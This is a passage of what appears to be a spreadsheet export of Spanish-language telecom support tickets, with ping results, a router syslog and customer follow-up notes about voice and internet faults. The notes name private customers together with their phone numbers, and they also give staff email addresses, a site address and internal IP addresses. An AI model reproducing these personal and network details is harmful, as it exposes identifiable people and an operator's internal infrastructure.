    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 186.151.15.17 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/6 MS
ENLACE SE VALIDA CON PERSONAL SOC Y CLIENTE EN SITIO SE TIENE NAVEGACION Y ESTABILIDAD
&lt;JTPAGTJUN1C1A04A02EIM1&gt;PING -VPN INTERNET_GT_DEPTAL 186.151.15.17
  PING 186.151.15.17: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 186.151.15.17: BYTES=56 SEQUENCE=1 TTL=255 TIME=1 MS
    REPLY FROM 186.151.15.17: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 186.151.15.17: BYTES=56 SEQUENCE=3 TTL=255 TIME=1 MS
    REPLY FROM 186.151.15.17: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
    REPLY FROM 186.151.15.17: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
  --- 186.151.15.17 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
&lt;JTPAGTJUN1C1A04A02EIM1&gt;PING -C 1500 -VPN INTERNET_GT_DEPTAL 186.151.15.17
  PING 186.151.15.17: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 186.151.15.17: BYTES=56 SEQUENCE=1 TTL=255 TIME=1 MS
    REPLY FROM 186.151.15.17: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 186.151.15.17: BYTES=56 SEQUENCE=3 TTL=255 TIME=1 MS
    REPLY FROM 186.151.15.17: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
  --- 186.151.15.17 PING STATISTICS ---
    4 PACKET(S) TRANSMITTED
    4 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
&lt;JTPAGTJUN1C1A04A02EIM1&gt;PING -C 1500 -M 30 -B -VPN INTERNET_GT_DEPTAL 186.151.15.17
  PING 186.151.15.17: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 186.151.15.17 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/6 MS</t>
  </si>
  <si>
    <t>F4596094</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE DAVID RODRIGUEZ. QUIEN INDICA QUE POSEE 5 E1 SOBRE EL GDN. SOLO SE ENCONTRO UN E1.
INDICA QUE EL PROBLEMA SE DIO A RAIZ DE QUE HUBO UN APAGON Y POSTERIORMENTE SE COMENZO A ESCUCHAR ENTRE CORTADO.
TAMBIEN INFORMA QUE TIENE VARIOS E1S QUE VAN A DAR HACIA LA MISMA PBX. PERO INDICA QUE LA PBX SE ENCUENTRA BIEN Y QUE LA TIENE EN UN DATA CENTER.
SE LE INDICO AL CLIENTE QUE POR PARTE DE CLARO NO SE OBSERVA AFECTACION.
2001308552,
COLA:
NOMBRE: A: 0050377003121
NÚMERO: 0050377003121
DURACIÓN: 0:00:10
ESTADO: MARCANDO
DETALLES: 0050377003121
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 9/06/2022 17:29:33</t>
  </si>
  <si>
    <t>SE HABLO NUEVAMENTE CON EL CLIENTE DAVID, QUIEN INDICA QUE YA IDENTIFICO QUE EL PROBLEMA ES HACIA EL PEER DE GENESIS QUE LE GENERA ESTE RUIDO.
SE HICIERON PRUEBAS LLAMANDO A LOS DIDS Y NO SE ESCUCHA EL RUIDO. CLIENTE VA A DAR SEGUIMIENTO CON SU PROVEEDOR PERO SOLICITA QUE SE LE ENVIE UN CORREO DE INFORMACION DE LO ANTERIOR.
2001314926
COLA:
NOMBRE: A: 0050377003121
NÚMERO: 0050377003121
DURACIÓN: 0:02:51
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050377003121
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 9/06/2022 18:04:59</t>
  </si>
  <si>
    <t>SE HABLO CON CLIENTE DAVID RODRIGUEZ E INDICA QUE YA ESTÁ VERIFICANDO EL PROBLEMA DEBIDO A QUE ES PROBLEMA INTERNO EN SU RED, INDICÓ QUE SI TIENE OTRA AFECTACION SE COMUNICARÁ. SE PROCEDE A CERRAR TICKET.</t>
  </si>
  <si>
    <t>SE ENVIO EL SIGUIENTE CORREO AL CLIENTE. QUIEN DARA SEGUIMIENTO CON EL PROVEEDOR Y SE ESTARA COMUNICANDO VIA CORREO.
BUENAS TARDES,
ESTIMADOS POR ESTE MEDIO SE LES INFORMA QUE SE REVISO EL NUMERO 22064000 Y EN SUS 5 E1S NO POSEE NINGUNA AFECTACIÓN.
SE REVISARON LOS SIGUIENTES E1 A LOS CUALES SE LES APLICO UN RESET.</t>
  </si>
  <si>
    <t>F4596121</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ 57081768  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001357394
**</t>
  </si>
  <si>
    <t>F4596135</t>
  </si>
  <si>
    <t>LLAMAR AL CLIENTE EN HORARIO HABIL PARA VALIDAR INFORMACION</t>
  </si>
  <si>
    <t>**SE LLAMA AL CLIENTE  CARMEN RIVERA AL 45063206 NO RESPONDE || SE INTENTARA LUEGO **
ID 2001361878
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARMEN RIVERA 45063206 MENCIONA QUE EL INCONVENIENTE PERSISTE, SE TRATA DE COMUNICAR CON GESTOR PERO NO RESPONDE, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001394783
NOMBRE DEL CLIENTE: BUSINESS CENTERS OF THE AMERICAS (LANDMARK DE GUATEMALA, S.A)
UBICACIÓN:ZONA PRADERA TORRE 1 NIVEL 12 - BLVD LOS PROCERES
CONTACTO EN SITIO: CARMEN RIVERA - 45063206
HORARIO DE ATENCION: HASTA LAS 15:00 HRS
GESTIÓN DE PERMISOS:DATOS DE PERSONAL TECNICO  CLAREVALO@LANDMARKRRHH.COM</t>
  </si>
  <si>
    <t>F4596137</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALICIA ALEGRIA/ 57949107 NO RESPONDE IVR INDICA QUE NUMERO ESTA APAGADO O FUERA DEL AREA DE COBERTURA || SE INTENTARA LUEGO **
-ID 2001343930
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALICIA ALEGRIA/ 57949107 NO RESPONDE IVR INDICA QUE NUMERO ESTA APAGADO O FUERA DEL AREA DE COBERTURA || SE INTENTARA LUEGO **
-ID 2001366522
**</t>
  </si>
  <si>
    <t>F4596140</t>
  </si>
  <si>
    <t>CLIENTE MARIO CONECTA COMPUTADORA DIRECTAMENTE AL ROUTER DE CLARO Y NO TIENE INCONVENIENTES, INDICA QUE CONTINUARA CON LAS PRUEBAS EN EQUIPOS INTERNOS Y QUE SE LE LLAME A PARTIR DE LAS 10:30 HORAS
2001388156
COLA:
NOMBRE: DE: LUVY ESAU SANDOVAL MATEO
NÚMERO: 7753
DURACIÓN: 0:22:47
ESTADO: DESCONECTADO [ÚLTIMO PARTICIPANTE DE CONFERENCIA]
DETALLES: 7753
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 10/06/2022 10:08:39</t>
  </si>
  <si>
    <t>CLIENTE ESTUARDO JOSE MARIO FUENTES LLAMA DEL 66283700 ID 2001387085 PARA EL SEGUIMIENTO DEL CASO SD1133770 DONDE SE VALIDA QUE NO SE CONTACTARON PARA EL SEGUIMIENTO Y EL CLIENTE PRESENTA LA MISMA AFECTACIÓN SE CONTACTA CON EL GESTOR A CARGO AL 8126 ID 2001388155 PERO NO ATIENDEN INGRESA CON FRANCISCO QUESADA Y COMENTA QUE VALIDARA TRANSFIERE LA LLAMADA CON LUVY SANDOVAL Y SE DEJA CON EL CL EN LINEA.</t>
  </si>
  <si>
    <t>SE LLAMA AL CL JORGE MARIO FUENTES AL 57099055 ID 2001354968  Y COMENTA QUE SIGUE LA AFECTACIÓN QUE SI CONECTO EL INTERNET PERO A PARTIR DE CONECTAR MAS COMPUTADORAS SE DESCONECTO EL INTERNET, SE TRANSFIERE AL GESTOR LUVY.SANDOVAL AL 8126 ID  2001355516 INGRESA CON EL GESTOR PERO NO RESPONDE HE INGRESA A BUZÓN, SE VUELVE A LLAMAR LE INGRESA NUEVAMENTE ID 2001355894 INGRESA AL GESTOR LA LLAMADA Y BRINDA NUEVAMENTE EL BUZÓN DE VOZ SE ESCALA CON JUAN MANUEL CARDONA AL 41287321 ID 2001356350 Y TRANSFIERE CON EL GESTOR A CARGO SE LE BRINDA LA INFORMACION Y SE DEJA CON EL CL EN LINEA</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, SE LLAMÓ A CLIENTE 57099055 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; LLAMAR MAÑANA A LAS 08:00AM</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE ESTARA REALIZANO PRUEBAS Y QUE SE LE LLAME A LAS 9:30 HORAS PARA VALIDAR ESTADO DEL TICKET.</t>
  </si>
  <si>
    <t>SE VALIDA CON CLIENTE EN LINEA QUE NO HAY INCONVENIENTE EN EL EQUIPO DE CLARO, SE CUENTA CON SALIDA HACIA INTERNET Y LA INTERFAZ LAN GIGABITETHERNET0/1/2, REFLEJA VARIAS CAIDAS
CC_INDUSTRIAS_PLASTICAS_GT_INTERNET_VILLA_NUEVA#SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 292 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 292 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 295 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (4096 BYTES):
ACE GIGABITETHERNET0/1/2, CHANGED STATE TO DOWN
JUN 10 14:10:45.022: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO DOWN
JUN 10 14:10:47.066: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.0.1 ON VLAN1, SOURCED BY C0A0.BBE4.FE14
JUN 10 14:10:48.031: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO UP
JUN 10 14:10:49.031: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO UP
JUN 10 14:11:22.746: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.0.1 ON VLAN1, SOURCED BY C0A0.BBE4.FE14
JUN 10 14:11:52.794: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.0.1 ON VLAN1, SOURCED BY C0A0.BBE4.FE14
JUN 10 14:11:56.020: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO DOWN
JUN 10 14:11:57.022: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO DOWN
JUN 10 14:12:00.955: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO UP
JUN 10 14:12:01.956: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO UP
JUN 10 14:12:27.032: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO DOWN
JUN 10 14:12:28.034: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO DOWN
JUN 10 14:12:50.959: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO UP
JUN 10 14:12:51.958: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO UP
JUN 10 14:13:13.099: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO DOWN
JUN 10 14:13:15.952: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO UP
JUN 10 14:15:12.033: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO DOWN
JUN 10 14:15:13.034: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO DOWN
JUN 10 14:15:15.955: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO UP
JUN 10 14:15:16.954: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO UP
JUN 10 14:16:52.839: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.0.1 ON VLAN1, SOURCED BY C0A0.BBE4.FE14
JUN 10 14:17:26.603: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.0.1 ON VLAN1, SOURCED BY C0A0.BBE4.FE14
JUN 10 14:17:56.741: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.0.1 ON VLAN1, SOURCED BY C0A0.BBE4.FE14
JUN 10 14:18:26.878: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.0.1 ON VLAN1, SOURCED BY C0A0.BBE4.FE14
JUN 10 14:18:57.016: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.0.1 ON VLAN1, SOURCED BY C0A0.BBE4.FE14
JUN 10 14:19:27.153: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.0.1 ON VLAN1, SOURCED BY C0A0.BBE4.FE14
JUN 10 14:19:57.291: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.0.1 ON VLAN1, SOURCED BY C0A0.BBE4.FE14
JUN 10 14:20:18.089: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO DOWN
JUN 10 14:20:19.091: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO DOWN
JUN 10 14:20:28.024: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO UP
JUN 10 14:20:29.025: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO UP
JUN 10 14:21:03.090: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO DOWN
JUN 10 14:21:05.955: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO UP
JUN 10 14:21:13.561: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.0.1 ON VLAN1, SOURCED BY C0A0.BBE5.05DC
JUN 10 14:21:53.461: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.0.1 ON VLAN1, SOURCED BY C0A0.BBE5.05DC
JUN 10 14:22:23.638: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.0.1 ON VLAN1, SOURCED BY C0A0.BBE5.05DC
JUN 10 14:22:53.855: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.0.1 ON VLAN1, SOURCED BY C0A0.BBE5.05DC
JUN 10 14:23:13.098: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO DOWN
JUN 10 14:23:15.954: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO UP
JUN 10 14:28:06.468: %SEC_LOGIN-5-LOGIN_SUCCESS: LOGIN SUCCESS [USER: GESTIONIP] [SOURCE: 10.174.170.1] [LOCALPORT: 23] AT 08:28:06 GTM FRI JUN 10 2022
CC_INDUSTRIAS_PLASTICAS_GT_INTERNET_VILLA_NUEVA#    PING 1.1.1.1 SO VLA 1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 1.1.1.1, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 186.151.15.161
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 28/30/32 MS</t>
  </si>
  <si>
    <t>F4596146</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE GABRIELA MADRILES 56928932   ##COMENTA QUE CUANDO TIENE RUIDO EN LAS LLAMADAS EN ESE MOMENTO NO PUEDE HACER NINGUN TIPO DE LLAMDA SALIENTE U ENTRANTE + QUE SE LE CORTA LA QUE ESTA EN CURSO## SE ACTIVARA EL GRAFICADOR EN MSAM PARA VER SI HAY ERRORES ## SE CONTACTARA EN 1 HORA A CLIENTE ## SE CORTA LA LLAMADA##
RESULTADO: CONTESTADA
NOMBRE: MARIA ISABEL GODINEZ SAENZ
NÚMERO: 7764
INICIO: HOY, 09:02
FIN: HOY, 09:09
DURACIÓN: 6:33
ID DE LLAMADA: 2001371329</t>
  </si>
  <si>
    <t>CLIENTE GABRIELA MADRILES 56928932 REALIZA VARIAS LLAMADAS DE 13 Y 15 MINUTOS Y VALIDA QUE YA NO PRESENTA RUIDO, PÉRDIDA DE AUDIO NI CORTE DE LLAMADAS, INDICA QUE ESCUCHA CLARAMENTE. EN LAS GRÁFICAS DEL PUERTO MSAN Y TRONCALES NO SE OBSERVA INCREMENTO DE ERRORES. CLIENTE GABRIELA SOLICITA SE LE LLAME A LAS 15:30 HORAS PARA VALIDAR EL CIERRE.
RESULTADO: LLAMADA HECHA
NOMBRE: 56928932
NÚMERO: 011 50256928932
INICIO: HOY, 09:29 A. M.
FIN: HOY, 09:44 A. M.
DURACIÓN: 15:22
ID DE LLAMADA: 3001275227</t>
  </si>
  <si>
    <t>SE HABLÓ CON GABRIELA MADRILES/PR 56928932 INDICA QUE POR LA MAÑANA TODO BIEN, PERO DESPUÉS DE LAS 16:15 HORAS HORAS PRESENTÓ EL PROBLEMA REPORTADO, PIDE SE VERIFIQUE DE NUEVO SERVICIO. SE INFORMA A GESTIÓN AE VÍA DE LO DICHO POR CLIENTE PR</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE GABRIELA MADRILES 56928932 SE LE INDICA QUE SE REALIZÓ LA REPARACION EN LA RED PRIMARIA DE LA RED DE COBRE. SE LE INDICA QUE SE COORDINARÁ CON PERSONAL DE CABLES EL CAMBIO DEL TRAMO MULTIPAR. CLIENTE INDICA QUE HASTA EL MOMENTO NO HA PRESENTADO INCONVENIENTES. AUTORIZA EL CIERRE DEL CASO. ID DE LLAMADA: 3001776883</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 56956068 PARA SEGUIMIENTO, NO CONTESTA; NOS DEBE APOYAR A TRAMITAR EL INGRESO DE TÉCNICOS A ASIGNAR; HAY SEGUIMIENTO VÍA CORREO.</t>
  </si>
  <si>
    <t>INFORMA CLIENTE GABRIELA MADRILES 56928932 QUE EL DÍA DE AYER PRESENTÓ 2 LLAMADAS CON INCONVENIENTES ALREDEDOR DE LAS 16 HORAS. CLIENTE INDICA QUE PUEDE TRAMITAR PERMISOS AL CENTRO COMERCIAL CUANDO LOS TÉCNICOS LLEGUEN. SE CONSULTARÁ CON AMILCAR RIVERA 56956068  SI PUEDE UTILIZAR LOS PERMISOS SOLICITADOS EL DÍA MARTES PARA ENVIAR TÉCNICO EL DÍA DE HOY PERO NOS ENVIA A BUZÓN.
ID DE LLAMADA: 3001501874, 3001505952</t>
  </si>
  <si>
    <t>SE TIENE EN LINEA A CLIENTE GABRIELA MADRILES 56928932, SE ESTÁN HACIENDO PRUEBAS DE LLAMADAS Y SE ESTÁ CORRIENDO PRUEBAS EN EL PUERTO MSAN Y LAS TRONCALES, NO SE OBSERVA INCREMENTO DE ERRORES ID: 3001275227</t>
  </si>
  <si>
    <t>EN LLAMADA CON CLIENTE INDICA QUE POR LA MAÑANA ÚNICAMENTE HA PRESENTADO UNA CAIDA EN UNA DE SUS LLAMADAS, SE LE INDICA AL CLIENTE QUE A NIVEL DE CLARO NO SE HAN PERCIBIDO CAIDAS, PERO COMENTA QUE HA PASADO EN DÍAS ANTERIORES POR LO QUE SOLICITA QUE SE CERTIFIQUE EL SERVICIO, LO SOLICITA PARA EL DÍA LUNES 13/06 A LAS 9 HORAS. SE PROCEDERÁ A COORDINAR. ID DE LLAMADA: 2001431980</t>
  </si>
  <si>
    <t>F4596160</t>
  </si>
  <si>
    <t>***--- NO SE OBTUBO RESPUESTA DE CNOC POR LO QUE SE ENVÍA A CL PRUEBAS DEL DIAGNOSTICO D INICIAL --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: VIERNES, 10 DE JUNIO DE 2022 05:54
PARA: BRUGADA HERNANDEZ DANIEL &lt;DBRUGADA@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GODINEZ MYURY FRIDA IRAIS &lt;FGMYURY@UNINET.COM.MX&gt;; PERLA MARINA ESTRADA PACAY &lt;PERLA.ESTRADA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002347194OC :: TICKET CNOC QCRL000119::: "FUERA DE SERVICIO"
ESTIMADO SR. DANIEL.
                LAMENTAMOS LA DEMORA, PERSONAL A CARGO NOS INDICA QUE EL SERVICIO SE OBSERVA OPERATIVO.
PODRÍA POYARNOS EN VALIDAR NUEVAMENTE YA QUE DESDE NUESTRO LADO NO SE OBSERVA EVENTO.
PING 10.201.6.66: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.201.6.66: BYTES=56 SEQUENCE=1 TTL=255 TIME=6 MS
    REPLY FROM 10.201.6.66: BYTES=56 SEQUENCE=2 TTL=255 TIME=5 MS
    REPLY FROM 10.201.6.66: BYTES=56 SEQUENCE=3 TTL=255 TIME=6 MS
    REPLY FROM 10.201.6.66: BYTES=56 SEQUENCE=4 TTL=255 TIME=5 MS
    REPLY FROM 10.201.6.66: BYTES=56 SEQUENCE=5 TTL=255 TIME=5 MS
  --- 10.201.6.66 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 5/5/6 MS
